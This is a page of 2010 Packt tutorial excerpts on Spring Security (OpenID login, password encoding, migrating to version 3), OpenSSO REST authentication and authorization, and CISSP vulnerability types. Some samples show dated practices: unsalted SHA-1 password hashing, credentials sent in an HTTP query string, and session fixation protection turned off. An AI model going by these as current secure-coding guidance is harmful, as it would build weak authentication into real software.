
How-To Tutorials - Cybersecurity

90 Articles
Packt
27 May 2010
7 min read

Opening up to OpenID with Spring Security

The promising world of OpenID

The promise of OpenID as a technology is to allow users on the web to centralize their personal data and information with a trusted provider, and then use that provider as a delegate to establish trustworthiness with other sites the user wants to interact with. In concept, this type of login through a trusted third party has existed for a long time in many different forms (Microsoft Passport, for example, was one of the more notable central login services on the web for some time). OpenID's distinct advantage is that an OpenID provider needs to implement only the public OpenID protocol to be compatible with any site seeking to integrate OpenID login. The OpenID specification itself is an open specification, which is why a diverse population of public providers currently runs the same protocol. This is an excellent recipe for healthy competition, and it is good for consumer choice.

The following diagram illustrates the high-level relationship between a site integrating OpenID during the login process and OpenID providers. The user presents his credentials in the form of a unique named identifier, typically a Uniform Resource Identifier (URI), which is assigned to the user by his OpenID provider and uniquely identifies both the user and the provider. This is commonly done either by prepending a subdomain to the URI of the OpenID provider (for example, https://jamesgosling.myopenid.com/), or by appending a unique identifier to the provider's URI (for example, https://me.yahoo.com/jamesgosling). Either way, the presented URI clearly identifies both the OpenID provider (via the domain name) and the unique user identifier.

Don't trust OpenID unequivocally! There is a fundamental assumption here that can fool users of the system.
It is possible for us to sign up for an OpenID that makes it appear as though we were James Gosling, even though we obviously are not. Do not assume that just because a user has a convincing-sounding OpenID (or OpenID delegate provider) they are the authentic person, without requiring additional forms of identification. Put another way: if someone came to your door simply claiming to be James Gosling, would you let him in without verifying his ID?

The OpenID-enabled application then redirects the user to the OpenID provider, where the user presents his credentials; the provider is then responsible for making an access decision. Once the access decision has been made, the provider redirects the user to the originating site, which is now assured of the user's authenticity. OpenID is much easier to understand once you have tried it. Let's add OpenID to the JBCP Pets login screen now!

Signing up for an OpenID

To get the full value of the exercises in this section (and to be able to test login), you'll need your own OpenID from one of the many available providers; a partial listing is available at http://openid.net/get-an-openid/. Common OpenID providers with which you probably already have an account are Yahoo!, AOL, Flickr, and MySpace. Google's OpenID support is slightly different, as we'll see later in this article when we add Sign In with Google support to our login page. To get full value out of the exercises in this article, we recommend you have accounts with at least:

- myOpenID
- Google

Enabling OpenID authentication with Spring Security

Spring Security provides convenient wrappers around provider integrations that are actually developed outside the Spring ecosystem. In this vein, the openid4java project (http://code.google.com/p/openid4java/) provides the underlying OpenID provider discovery and request/response negotiation for the Spring Security OpenID functionality.
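Both identifier styles described earlier (subdomain and path-appended) encode the provider in the URI's host. As a quick illustration of this point, here is our own sketch; the class and method names are hypothetical, not code from the article:

```java
import java.net.URI;

// Sketch: an OpenID identifier names both the provider (via the host)
// and the user (via a subdomain or a path segment).
public class OpenIdIdentifierDemo {
    // Returns the provider host portion of an OpenID identifier.
    static String providerHost(String openId) {
        return URI.create(openId).getHost();
    }

    public static void main(String[] args) {
        // Subdomain style: the user name is a subdomain of the provider.
        System.out.println(providerHost("https://jamesgosling.myopenid.com/"));
        // Path style: the user name is appended to the provider URI.
        System.out.println(providerHost("https://me.yahoo.com/jamesgosling"));
    }
}
```

In both cases the host alone tells the relying party which provider to contact, while the full URI identifies the individual user.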
Writing an OpenID login form

It's typically the case that a site will present both standard (username and password) and OpenID login options on a single login page, allowing the user to select one or the other, as we can see on the JBCP Pets target login page. The code for the OpenID-based form is as follows:

```html
<h1>Or, Log Into Your Account with OpenID</h1>
<p>
  Please use the form below to log into your account with OpenID.
</p>
<form action="j_spring_openid_security_check" method="post">
  <label for="openid_identifier">Login</label>:
  <input id="openid_identifier" name="openid_identifier" size="20"
      maxlength="100" type="text"/>
  <img src="images/openid.png" alt="OpenID"/>
  <br />
  <input type="submit" value="Login"/>
</form>
```

The name of the form field, openid_identifier, is not a coincidence. The OpenID specification recommends that implementing websites use this name for their OpenID login field, so that user agents (browsers) have semantic knowledge of the field's function. There are even browser plug-ins, such as VeriSign's OpenID SeatBelt (https://pip.verisignlabs.com/seatbelt.do), that take advantage of this knowledge to pre-populate your OpenID credentials into any recognizable OpenID field on a page.

You'll note that we don't offer the remember me option with OpenID login. This is because the redirection to and from the provider causes the remember me checkbox value to be lost, so that when the user is successfully authenticated, the remember me option is no longer indicated. This is unfortunate, but it ultimately increases the security of OpenID as a login mechanism for our site, as OpenID forces the user to establish a trust relationship through the provider with each and every login.
Configuring OpenID support in Spring Security

Turning on basic OpenID support, via the inclusion of a servlet filter and authentication provider, is as simple as adding a directive to our <http> configuration element in dogstore-security.xml:

```xml
<http auto-config="true" ...>
  <!-- Omitting content... -->
  <openid-login/>
</http>
```

After adding this configuration element and restarting the application, you will be able to use the OpenID login form to present an OpenID and navigate through the OpenID authentication process. When you are returned to JBCP Pets, however, you will be denied access. This is because your credentials won't have any roles assigned to them. We'll take care of this next.

Adding OpenID users

As we do not yet have OpenID-enabled new user registration, we'll need to manually insert the user account that we'll be testing into the database, by adding it to test-users-groups-data.sql in our database bootstrap code. We recommend that you use myOpenID for this step (notably, you will have trouble with Yahoo!, for reasons we'll explain in a moment). If we assume that our OpenID is https://jamesgosling.myopenid.com/, then the SQL we'd insert in this file is as follows:

```sql
insert into users(username, password, enabled, salt) values (
  'https://jamesgosling.myopenid.com/','unused',true,
  CAST(RAND()*1000000000 AS varchar));
insert into group_members(group_id, username)
  select id,'https://jamesgosling.myopenid.com/' from groups
  where group_name='Administrators';
```

You'll note that this is similar to the other data we inserted for our traditional username-and-password-based admin account, with the exception that we have the value unused for the password. We do this, of course, because OpenID-based login doesn't require our site to store a password on behalf of the user!
The observant reader will note, however, that this does not allow a user to create an arbitrary username and password and associate it with an OpenID; we describe this process briefly later in this article, and you are welcome to explore how to do it as an advanced application of this technology.

At this point, you should be able to complete a full login using OpenID. The sequence of redirects is illustrated with arrows in the following screenshot.

We've now OpenID-enabled JBCP Pets login! Feel free to test using several OpenID providers. You'll notice that, although the overall functionality is the same, the experience a provider offers when reviewing and accepting the OpenID request differs greatly from provider to provider.

Packt
24 May 2010
6 min read

Encode your password with Spring Security 3

This article by Peter Mularien is an excerpt from the book Spring Security 3. In this article, we will:

- Examine different methods of configuring password encoding
- Understand the password salting technique of providing additional security to stored passwords

In any secured system, password security is a critical aspect of trust and authoritativeness of an authenticated principal. Designers of a fully secured system must ensure that passwords are stored in a way that makes it impractically difficult for malicious users to compromise them. The following general rules should be applied to passwords stored in a database:

- Passwords must not be stored in cleartext (plain text)
- Passwords supplied by the user must be compared to recorded passwords in the database
- A user's password should not be supplied to the user upon demand (even if the user forgets it)

For the purposes of most applications, the best fit for these requirements involves one-way encoding or encryption of passwords, along with some type of randomization of the encrypted passwords. One-way encoding provides the security and uniqueness properties that are important to properly authenticate users, with the added bonus that once encrypted, the password cannot be decrypted. In most secure application designs, it is neither required nor desirable to ever retrieve the user's actual password upon request, as providing the user's password to them without proper additional credentials could present a major security risk. Most applications instead provide the user the ability to reset their password, either by presenting additional credentials (such as their social security number, date of birth, tax ID, or other personal information), or through an email-based system.
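The one-way encoding approach just described can be sketched in a few lines of Java. This is our own illustration with hypothetical names, not the book's code: we store only the digest of a password, and at login time we re-encode the supplied value and compare digests, never decrypting anything.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;

// Sketch of one-way password encoding: only the digest is stored,
// and comparison happens in digest space.
public class OneWayEncodingDemo {
    // Hex-encoded SHA-256 digest of the input string.
    static String sha256Hex(String input) {
        try {
            byte[] digest = MessageDigest.getInstance("SHA-256")
                    .digest(input.getBytes(StandardCharsets.UTF_8));
            StringBuilder hex = new StringBuilder();
            for (byte b : digest) hex.append(String.format("%02x", b));
            return hex.toString();
        } catch (java.security.NoSuchAlgorithmException e) {
            throw new IllegalStateException(e);
        }
    }

    // Login check: re-encode the supplied password and compare with
    // the stored digest; the cleartext is never recovered.
    static boolean matches(String supplied, String storedDigest) {
        return sha256Hex(supplied).equals(storedDigest);
    }

    public static void main(String[] args) {
        String stored = sha256Hex("secret");           // what the database holds
        System.out.println(matches("secret", stored)); // correct password
        System.out.println(matches("guess", stored));  // wrong password
    }
}
```

This satisfies the first and second rules above directly; the third rule (never returning the password on demand) falls out naturally, since the cleartext simply is not stored.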
Storing other types of sensitive information

Many of the guidelines that apply to passwords apply equally to other types of sensitive information, including social security numbers and credit card information (although, depending on the application, some of these may require the ability to decrypt). It's quite common for databases storing this type of information to represent it in multiple ways; for example, a customer's full 16-digit credit card number would be stored in a highly encrypted form, but the last four digits might be stored in cleartext (for reference, think of any internet commerce site that displays XXXX XXXX XXXX 1234 to help you identify your stored credit cards).

You may already be thinking ahead and wondering, given our (admittedly unrealistic) approach of using SQL to populate our HSQL database with users, how do we encode the passwords? HSQL, like most other databases, doesn't offer encryption methods as built-in database functions. Typically, the bootstrap process (populating a system with initial users and data) is handled through some combination of SQL loads and Java code. Depending on the complexity of your application, this process can get very complicated. For the JBCP Pets application, we'll retain the embedded-database declaration and the corresponding SQL, and then add a small bit of Java that fires after the initial load to encrypt all the passwords in the database.

For password encryption to work properly, the two actors involved (the code that stores passwords and the code that validates them at login) must apply password encryption in synchronization, ensuring that passwords are treated and validated consistently. Password encryption in Spring Security is encapsulated and defined by implementations of the o.s.s.authentication.encoding.PasswordEncoder interface.
Simple configuration of a password encoder is possible through the <password-encoder> declaration within the <authentication-provider> element as follows:

```xml
<authentication-manager alias="authenticationManager">
  <authentication-provider user-service-ref="jdbcUserService">
    <password-encoder hash="sha"/>
  </authentication-provider>
</authentication-manager>
```

You'll be happy to learn that Spring Security ships with a number of implementations of PasswordEncoder, applicable to different needs and security requirements. The implementation used can be specified using the hash attribute of the <password-encoder> declaration. The following table lists the out-of-the-box implementation classes and their benefits. Note that all implementations reside in the o.s.s.authentication.encoding package.

| Implementation class | Description | hash value |
|---|---|---|
| PlaintextPasswordEncoder | Encodes the password as plaintext. Default DaoAuthenticationProvider password encoder. | plaintext |
| Md4PasswordEncoder | PasswordEncoder utilizing the MD4 hash algorithm. MD4 is not a secure algorithm; use of this encoder is not recommended. | md4 |
| Md5PasswordEncoder | PasswordEncoder utilizing the MD5 one-way encoding algorithm. | md5 |
| ShaPasswordEncoder | PasswordEncoder utilizing the SHA one-way encoding algorithm. This encoder can support configurable levels of encoding strength. | sha, sha-256 |
| LdapShaPasswordEncoder | Implementation of LDAP SHA and LDAP SSHA algorithms, used in integration with LDAP authentication stores. | {sha}, {ssha} |

As with many other areas of Spring Security, it's also possible to reference a bean definition implementing PasswordEncoder to provide more precise configuration and allow the PasswordEncoder to be wired into other beans through dependency injection. For JBCP Pets, we'll need to use this bean reference method in order to encode the bootstrapped user data. Let's walk through the process of configuring basic password encoding for the JBCP Pets application.
Configuring password encoding

Configuring basic password encoding involves two pieces: encrypting the passwords we load into the database after the SQL script executes, and ensuring that the DaoAuthenticationProvider is configured to work with a PasswordEncoder.

Configuring the PasswordEncoder

First, we'll declare an instance of a PasswordEncoder as a normal Spring bean:

```xml
<bean class="org.springframework.security.authentication.encoding.ShaPasswordEncoder"
    id="passwordEncoder"/>
```

You'll note that we're using the SHA-1 PasswordEncoder implementation. This is an efficient one-way encryption algorithm, commonly used for password storage.

Configuring the AuthenticationProvider

We'll need to configure the DaoAuthenticationProvider with a reference to the PasswordEncoder, so that it can encode and compare the presented password during user login. Simply add a <password-encoder> declaration and refer to the bean ID we defined in the previous step:

```xml
<authentication-manager alias="authenticationManager">
  <authentication-provider user-service-ref="jdbcUserService">
    <password-encoder ref="passwordEncoder"/>
  </authentication-provider>
</authentication-manager>
```

Try to start the application at this point, and then try to log in. You'll notice that previously valid login credentials are now rejected. This is because the passwords stored in the database (loaded with the bootstrap test-users-groups-data.sql script) are not stored in an encrypted form that matches the password encoder. We'll need to post-process the bootstrap data with some simple Java code.

Writing the database bootstrap password encoder

The approach we'll take for encoding the passwords loaded via SQL is to have a Spring bean that executes an init method after the embedded-database bean is instantiated. The code for this bean, com.packtpub.springsecurity.security.DatabasePasswordSecurerBean, is fairly simple.
```java
public class DatabasePasswordSecurerBean extends JdbcDaoSupport {
  @Autowired
  private PasswordEncoder passwordEncoder;

  public void secureDatabase() {
    getJdbcTemplate().query("select username, password from users",
        new RowCallbackHandler() {
          @Override
          public void processRow(ResultSet rs) throws SQLException {
            String username = rs.getString(1);
            String password = rs.getString(2);
            String encodedPassword =
                passwordEncoder.encodePassword(password, null);
            getJdbcTemplate().update(
                "update users set password = ? where username = ?",
                encodedPassword, username);
            logger.debug("Updating password for username: "
                + username + " to: " + encodedPassword);
          }
        });
  }
}
```

The code uses Spring's JdbcTemplate functionality to loop through all the users in the database and encode each password using the injected PasswordEncoder reference. Each password is updated individually.
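Note that the bean above passes null as the salt. The salting technique mentioned at the start of the article goes one step further, mixing a per-user salt into the digest so that identical passwords yield different stored values. The following is our own hedged sketch of that idea (the class and the password{salt} concatenation scheme are illustrative, not the framework's actual implementation):

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;

// Sketch of salted one-way encoding: a per-user salt is mixed into the
// input before hashing, so identical passwords store differently.
public class SaltDemo {
    static String sha256Hex(String s) {
        try {
            byte[] d = MessageDigest.getInstance("SHA-256")
                    .digest(s.getBytes(StandardCharsets.UTF_8));
            StringBuilder hex = new StringBuilder();
            for (byte b : d) hex.append(String.format("%02x", b));
            return hex.toString();
        } catch (java.security.NoSuchAlgorithmException e) {
            throw new IllegalStateException(e);
        }
    }

    // Combine password and salt before hashing; the same encoder must be
    // used both when storing and when validating.
    static String encode(String password, String salt) {
        return sha256Hex(password + "{" + salt + "}");
    }

    public static void main(String[] args) {
        String alice = encode("sharedPassword", "salt-for-alice");
        String bob = encode("sharedPassword", "salt-for-bob");
        // Same password, different salts: the stored digests differ,
        // which defeats precomputed-dictionary (rainbow table) attacks.
        System.out.println(alice.equals(bob));
    }
}
```

This is why the users table in our bootstrap SQL carries a salt column: the randomized salt is what provides the "randomization of the encrypted passwords" called for at the start of the article.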

Packt
21 May 2010
5 min read

Migration to Spring Security 3

During the course of this article we will:

- Review important enhancements in Spring Security 3
- Understand the configuration changes required in your existing Spring Security 2 applications when moving them to Spring Security 3
- Illustrate the overall movement of important classes and packages in Spring Security 3

Once you have completed the review of this article, you will be in a good position to migrate an existing application from Spring Security 2 to Spring Security 3.

Migrating from Spring Security 2

You may be planning to migrate an existing application to Spring Security 3, or trying to add functionality to a Spring Security 2 application and looking for guidance. We'll try to address both concerns in this article. First, we'll run through the important differences between Spring Security 2 and 3, both in terms of features and configuration. Second, we'll provide some guidance in mapping configuration or class name changes. These will better enable you to translate the examples from Spring Security 3 back to Spring Security 2 (where applicable).

A very important migration note: Spring Security 3 mandates a migration to Spring Framework 3 and Java 5 (1.5) or greater. Be aware that in many cases, migrating these other components may have a greater impact on your application than the upgrade of Spring Security itself!

Enhancements in Spring Security 3

Significant enhancements in Spring Security 3 over Spring Security 2 include the following:

- The addition of Spring Expression Language (SpEL) support for access declarations, both in URL patterns and method access specifications.
- Additional fine-grained configuration around authentication and access successes and failures.
- Enhanced method access declaration capabilities, including annotation-based pre- and post-invocation access checks and filtering, as well as highly configurable security namespace XML declarations for custom backing bean behavior.
- Fine-grained management of session access and concurrency control using the security namespace.
- Noteworthy revisions to the ACL module, including the removal of the legacy ACL code in o.s.s.acl and fixes for some important issues in the ACL framework.
- Support for OpenID Attribute Exchange, and other general improvements to the robustness of OpenID.
- New Kerberos and SAML single sign-on support through the Spring Security Extensions project.

Other, more innocuous changes encompassed a general restructuring and clean-up of the codebase and the configuration of the framework, so that the overall structure and usage make much more sense. The authors of Spring Security have made efforts to add extensibility where none previously existed, especially in the areas of login and URL redirection.

If you are already working in a Spring Security 2 environment, you may not find compelling reasons to upgrade if you aren't pushing the boundaries of the framework. However, if you have found limitations in the available extension points, code structure, or configurability of Spring Security 2, you'll welcome many of the minor changes we discuss in detail in the remainder of this article.

Changes to configuration in Spring Security 3

Many of the changes in Spring Security 3 are visible in the security namespace style of configuration. Although this article cannot cover all of the minor changes in detail, we'll try to cover those most likely to affect you as you move to Spring Security 3.

Rearranged AuthenticationManager configuration

The most obvious changes in Spring Security 3 deal with the configuration of the AuthenticationManager and any related AuthenticationProvider elements. In Spring Security 2, the AuthenticationManager and AuthenticationProvider configuration elements were completely disconnected; declaring an AuthenticationProvider didn't require any notion of an AuthenticationManager at all.
```xml
<authentication-provider>
  <jdbc-user-service data-source-ref="dataSource"/>
</authentication-provider>
```

In Spring Security 2, it was possible to declare the <authentication-manager> element as a sibling of any AuthenticationProvider:

```xml
<authentication-manager alias="authManager"/>
<authentication-provider>
  <jdbc-user-service data-source-ref="dataSource"/>
</authentication-provider>
<ldap-authentication-provider server-ref="ldap://localhost:10389/"/>
```

In Spring Security 3, all AuthenticationProvider elements must be children of the <authentication-manager> element, so this would be rewritten as follows:

```xml
<authentication-manager alias="authManager">
  <authentication-provider>
    <jdbc-user-service data-source-ref="dataSource"/>
  </authentication-provider>
  <ldap-authentication-provider server-ref="ldap://localhost:10389/"/>
</authentication-manager>
```

Of course, this means that the <authentication-manager> element is now required in any security namespace configuration.

If you had defined a custom AuthenticationProvider in Spring Security 2, you would have decorated it with the <custom-authentication-provider> element as part of its bean definition:

```xml
<bean id="signedRequestAuthenticationProvider"
    class="com.packtpub.springsecurity.security.SignedUsernamePasswordAuthenticationProvider">
  <security:custom-authentication-provider/>
  <property name="userDetailsService" ref="userDetailsService"/>
  <!-- ... -->
</bean>
```

When moving this custom AuthenticationProvider to Spring Security 3, we would remove the decorator element and instead configure the AuthenticationProvider using the ref attribute of the <authentication-provider> element as follows:

```xml
<authentication-manager alias="authenticationManager">
  <authentication-provider ref="signedRequestAuthenticationProvider"/>
</authentication-manager>
```

Of course, the source code of our custom provider would change due to class relocations and renaming in Spring Security 3; look later in the article for basic guidelines, and in the code download for this article for a detailed mapping.

New configuration syntax for session management options

In addition to continuing support for the session fixation and concurrency control features from prior versions of the framework, Spring Security 3 adds new configuration capabilities for customizing the URLs and classes involved in session and concurrency control management. If your older application configured session fixation protection or concurrent session control, the configuration settings have a new home in the <session-management> directive of the <http> element. In Spring Security 2, these options were configured as follows:

```xml
<http ... session-fixation-protection="none">
  <!-- ... -->
  <concurrent-session-control exception-if-maximum-exceeded="true"
      max-sessions="1"/>
</http>
```

The analogous configuration in Spring Security 3 removes the session-fixation-protection attribute from the <http> element and consolidates as follows:

```xml
<http ...>
  <session-management session-fixation-protection="none">
    <concurrency-control error-if-maximum-exceeded="true"
        max-sessions="1"/>
  </session-management>
</http>
```

You can see that the new logical organization of these options is much more sensible and leaves room for future expansion.
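The SpEL support mentioned in the enhancements list is another example of the new expressiveness: access declarations can combine expressions directly in URL patterns. The following is our own hedged illustration (the URL patterns, role name, and IP range are ours, not from the article); it assumes the Spring Security 3 expression syntax enabled via use-expressions:

```xml
<http use-expressions="true">
  <!-- Combine role and network checks in one SpEL access declaration -->
  <intercept-url pattern="/admin/**"
      access="hasRole('ROLE_ADMIN') and hasIpAddress('192.168.1.0/24')"/>
  <intercept-url pattern="/**" access="permitAll"/>
</http>
```

In Spring Security 2, an equivalent rule would have required a custom voter; in Spring Security 3 it is a single attribute value.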

Packt
12 May 2010
8 min read

Securing our Applications using OpenSSO in GlassFish Security

An example of such a system is the integration between an online shopping system, the product provider who actually produces the goods, the insurance company that provides insurance on purchases, and the shipping company that delivers the goods to the consumer's hands. All of these systems access some part of the data, which flows into the other software so each can perform its job in an efficient way. All the employees can benefit from a single sign-on solution, which keeps them free from having to authenticate themselves multiple times during the working day. Another example is a travel portal, whose clients need to communicate with many other systems to plan their traveling.

Integration between an in-house system and external partners can happen at different levels, from communication protocol and data format to security policies, authentication, and authorization. Because of the variety of communication models, policies, and client types that each partner may use, unifying the security model is almost impossible, and the need for some kind of integration mechanism makes itself felt more and more. SSO as a concept, and OpenSSO as a product, address this need to integrate systems' security.

OpenSSO provides developers with several client interfaces to interact with OpenSSO to perform authentication, authorization, session and identity management, and auditing. These interfaces include Client SDKs for different programming languages, using standards including:

- Liberty Alliance Project and Security Assertion Markup Language (SAML) for authentication and single sign-on (SSO)
- XML Access Control Markup Language (XACML) for authorization functions
- Service Provisioning Markup Language (SPML) for identity management functions

Using the client SDKs and the standards mentioned above is suitable when we are developing custom solutions or integrating our system with partners that already use them in their security infrastructure.
For any other scenario these methods are overkill for developers. To make it easier for developers to interact with OpenSSO core services, the Identity Web Services (IWS) are provided. We discussed IWS briefly in the OpenSSO functionalities section. The IWS are included in OpenSSO to perform the tasks in the following table.

| Task | Description |
|---|---|
| Authentication and single sign-on | Verifying the user credentials or its authentication token. |
| Authorization | Checking the authenticated user's permissions for accessing a resource. |
| Provisioning | Creating, deleting, searching, and editing users. |
| Logging | Ability to audit and record operations. |

IWS are exposed in two models: the first is WS-* compliant SOAP-based web services, and the second is a very simple but elegant RESTful set of services based on HTTP and REST principles. Finally, the third way of using OpenSSO is deploying policy agents to protect the resources available in a container. In the following section we will use the RESTful interface to perform authentication, authorization, and SSO.

Authenticating users by the RESTful interface

Performing authentication using the RESTful web services interface is very simple, as it is just like performing pure HTTP communication with an HTTP server. For each type of operation there is one URL, which may have some required parameters, and the output is what we can expect from that operation. The URL for the authentication operation, along with its parameters, is as follows:

- Operation: Authentication
- Operation URL: http://host:port/OpenSSOContext/identity/authenticate
- Parameters: username, password, uri
- Output: subjectid

The Operation URL specifies the address of a Servlet which will receive the required parameters, perform the operation, and write back the result. In the template included above we have the host, port, and OpenSSOContext, which are things we already know. After the context we have the path to the RESTful service we want to invoke.
The path includes the task type, which can be one of the tasks included in the IWS task list table, and the operation we want to invoke. All parameters are self-descriptive except uri. We pass a URL to have our users redirected to it after the authentication is performed. This URL can include information related to the user or the original resource the user requested. In the case of successful authentication we will receive a subjectid, which we can use in any other RESTful operation, such as authorization, logging in, logging out, and so on. If you remember session IDs from your web development experience, subjectid is the same as a session ID. You can view all sessions, along with related information, from the OpenSSO administration console homepage under the Sessions tab.

The following listing shows a sample JSP page which performs a RESTful call to OpenSSO to authenticate a user and obtain a session ID for the user if they are authenticated.

```jsp
<%
try {
    String operationURL =
        "http://gfbook.pcname.com:8080/opensso/identity/authenticate";
    String username = "james";
    String password = "james";
    username = java.net.URLEncoder.encode(username, "UTF-8");
    password = java.net.URLEncoder.encode(password, "UTF-8");
    String operationString = operationURL + "?username=" + username
        + "&password=" + password;
    java.net.URL operation = new java.net.URL(operationString);
    java.net.HttpURLConnection connection =
        (java.net.HttpURLConnection) operation.openConnection();
    int responseCode = connection.getResponseCode();
    if (responseCode == java.net.HttpURLConnection.HTTP_OK) {
        java.io.BufferedReader reader = new java.io.BufferedReader(
            new java.io.InputStreamReader(
                (java.io.InputStream) connection.getContent()));
        out.println("<h2>Subject ID</h2>");
        String line = reader.readLine();
        out.println(line);
    }
} catch (Exception e) {
    e.printStackTrace();
}
%>
```

REST makes straightforward tasks easier than ever.
Without REST we would have had to deal with the complexity of SOAP, WSDL, and so on, but with REST you can understand the whole code on a first scan. Beginning from the top, we define the REST operation URL, which is assembled from the operation URL with the required parameters appended as name/value pairs. The URL we connect to will be something like:

http://gfbook.pcname.com:8080/opensso/identity/authenticate?username=james&password=james

After assembling the URL, we open a network connection to perform the authentication. After opening the connection we can check whether we received an HTTP_OK response from the server. Receiving HTTP_OK means that the authentication was successful and we can read the subjectid from the socket. The connection may result in other response codes, like HTTP_UNAUTHORIZED (HTTP error code 401) when the credentials are not valid. A complete list of possible return values can be found at http://java.sun.com/javase/6/docs/api/java/net/HttpURLConnection.html.

Authorizing using REST

If you remember, in the Configuring OpenSSO for authentication and authorization section we defined a rule that was set to police the http://gfbook.pcname.com:8080/ URL for us, and later we applied the policy rule to a group of users that we created; now we want to check how our policy works. In every security system, before any authorization process, an authentication process must complete with a positive result. In our case the result of authentication is the subjectid, which the authorization process will use to check whether the authenticated entity is allowed to perform the action or not.
The URL for the authorization operation along with its parameters is as follows:

Operation: Authorization
Operation URL: http://host:port/OpenSSOContext/identity/authorize
Parameters: uri, action, subjectid
Output: true or false, based on the subject's permission to perform the given action on the entity

The combination of uri, action, and subjectid specifies that we want to check whether our client, identified by subjectid, has permission to perform the specified action on the resource identified by the uri. The output of the service invocation is either true or false. The following listing shows how we can check whether an authenticated user has access to a certain resource. In the sample code we check james, identified by the subjectid we acquired by executing the previous code snippet, against the localhost Protector rule we defined earlier.

<%
try {
    String operationURL =
        "http://gfbook.pcname.com:8080/opensso/identity/authorize";
    String protectedUrl = "http://127.0.0.1:38080/Conversion-war/";
    String subjectId =
        "AQIC5wM2LY4SfcyemVIZX6qBGdyH7b8C5KFJjuuMbw4oj24=@AAJTSQACMDE=#";
    String action = "POST";
    protectedUrl = java.net.URLEncoder.encode(protectedUrl, "UTF-8");
    subjectId = java.net.URLEncoder.encode(subjectId, "UTF-8");
    String operationString = operationURL + "?uri=" + protectedUrl +
        "&action=" + action + "&subjectid=" + subjectId;
    java.net.URL Operation = new java.net.URL(operationString);
    java.net.HttpURLConnection connection =
        (java.net.HttpURLConnection) Operation.openConnection();
    int responseCode = connection.getResponseCode();
    if (responseCode == java.net.HttpURLConnection.HTTP_OK) {
        java.io.BufferedReader reader = new java.io.BufferedReader(
            new java.io.InputStreamReader(
                (java.io.InputStream) connection.getContent()));
        out.println("<h2>Authorization Result</h2>");
        String line = reader.readLine();
        out.println(line);
    }
} catch (Exception e) {
    e.printStackTrace();
}
%>

For this listing everything is the same as the authentication process in terms of initializing objects and
calling methods, except that at the beginning we define the protected URL string and include the subjectid that resulted from our previous authentication. We then define the action whose permission we want to check for our authenticated user, and finally we read the result of the authorization. The complete operation URL, after including all parameters, is similar to the following snippet:

http://gfbook.pcname.com:8080/opensso/identity/authorize?uri=http://127.0.0.1:38080/Conversion-war/&action=POST&subjectid=subjectId

Note that no two subjectid values are ever the same, even for the same user on the same machine and the same OpenSSO installation. So, before running this code, make sure that you perform the authentication process and substitute the subjectid resulting from your authentication for the one shown above.
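The assembly of the two operation URLs can be factored into a small helper. The following is a hypothetical sketch (the class and method names are ours, not part of the OpenSSO API); it also shows why the subjectid must be URL-encoded, since it contains '=', '@', and '#' characters:

```java
import java.io.UnsupportedEncodingException;
import java.net.URLEncoder;

public class OpenSsoUrls {

    // URL-encode a parameter value; UTF-8 is always available,
    // so the checked exception can never actually be thrown.
    static String enc(String s) {
        try {
            return URLEncoder.encode(s, "UTF-8");
        } catch (UnsupportedEncodingException e) {
            throw new AssertionError(e);
        }
    }

    // Assemble the authenticate operation URL used in the first listing.
    static String authenticateUrl(String base, String user, String pass) {
        return base + "/identity/authenticate"
                + "?username=" + enc(user) + "&password=" + enc(pass);
    }

    // Assemble the authorize operation URL used in the second listing.
    static String authorizeUrl(String base, String uri, String action,
                               String subjectId) {
        return base + "/identity/authorize"
                + "?uri=" + enc(uri) + "&action=" + action
                + "&subjectid=" + enc(subjectId);
    }
}
```

For example, authorizeUrl("http://host:8080/opensso", uri, "POST", subjectId) yields a URL in which the '=' and '#' of the subjectid have become %3D and %23, which is why pasting a raw subjectid into the browser address bar does not work.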
CISSP: Vulnerability and Penetration Testing for Access Control

Packt
12 Mar 2010
6 min read
IT components such as operating systems, application software, and even networks, have many vulnerabilities. These vulnerabilities are open to compromise or exploitation. This creates the possibility for penetration into the systems that may result in unauthorized access and a compromise of confidentiality, integrity, and availability of information assets. Vulnerability tests are performed to identify vulnerabilities, while penetration tests are conducted to check the following:

- The possibility of compromising the systems such that the established access control mechanisms may be defeated and unauthorized access is gained
- Whether the systems can be shut down or overloaded with malicious data, using techniques such as DoS attacks, to the point where access by legitimate users or processes may be denied

Vulnerability assessment and penetration testing processes are like IT audits. Therefore, it is preferred that they are performed by third parties. The primary purpose of vulnerability and penetration tests is to identify, evaluate, and mitigate the risks due to vulnerability exploitation.

Vulnerability assessment

Vulnerability assessment is a process in which the IT systems such as computers and networks, and software such as operating systems and application software, are scanned in order to identify the presence of known and unknown vulnerabilities. Vulnerabilities in IT systems such as software and networks can be considered holes or errors. These vulnerabilities are due to improper software design, insecure coding, or both. For example, buffer overflow is a vulnerability where the boundary limits for an entity such as variables and constants are not properly defined or checked. This can be exploited by supplying more data than the entity can hold. This results in a memory spill over into other areas and thereby corrupts the instructions or code that need to be processed by the microprocessor.
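The boundary check whose absence causes a buffer overflow can be illustrated with a short sketch. This is our own example, not from the article; Java enforces array bounds at runtime, unlike the native code the article describes, but the explicit check is the same idea:

```java
public class BoundsCheck {
    // Copy src into dest only if it fits -- the kind of explicit
    // boundary check whose omission leads to buffer overflows.
    static boolean copyInto(byte[] dest, byte[] src) {
        if (src.length > dest.length) {
            return false; // reject data larger than the buffer can hold
        }
        System.arraycopy(src, 0, dest, 0, src.length);
        return true;
    }
}
```

A call such as copyInto(new byte[4], new byte[8]) is rejected instead of spilling into adjacent memory.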
When a vulnerability is exploited it results in a security violation, which will have a certain impact. A security violation may be unauthorized access, escalation of privileges, or denial of service to the IT systems. Tools are used in the process of identifying vulnerabilities. These tools are called vulnerability scanners. A vulnerability scanning tool can be hardware-based or a software application. Generally, vulnerabilities can be classified based on the type of security error. A type is a root cause of the vulnerability. Vulnerabilities can be classified into the following types:

Access Control Vulnerabilities

It is an error due to the lack of enforcement pertaining to users or functions that are permitted, or denied, access to an object or a resource.

Examples: improper or no access control list or table; no privilege model; inadequate file permissions; improper or weak encoding

Security violation and impact: files, objects, or processes can be accessed directly without authentication or routing.

Authentication Vulnerabilities

It is an error due to inadequate identification mechanisms, so that a user or a process is not correctly identified.

Examples: weak or static passwords; improper or weak encoding, or weak algorithms

Security violation and impact: an unauthorized or less privileged user (for example, a Guest user), or a less privileged process, gains higher privileges, such as administrative or root access to the system.

Boundary Condition Vulnerabilities

It is an error due to inadequate checking and validating mechanisms, such that the length of the data is not checked or validated against the size of the data storage or resource.

Examples: buffer overflow; overwriting the original data in the memory

Security violation and impact: memory is overwritten with some arbitrary code so that it gains access to programs or corrupts the memory. This will ultimately crash the operating system.
An unstable system due to memory corruption may be exploited to get command prompt, or shell access, by injecting arbitrary code.

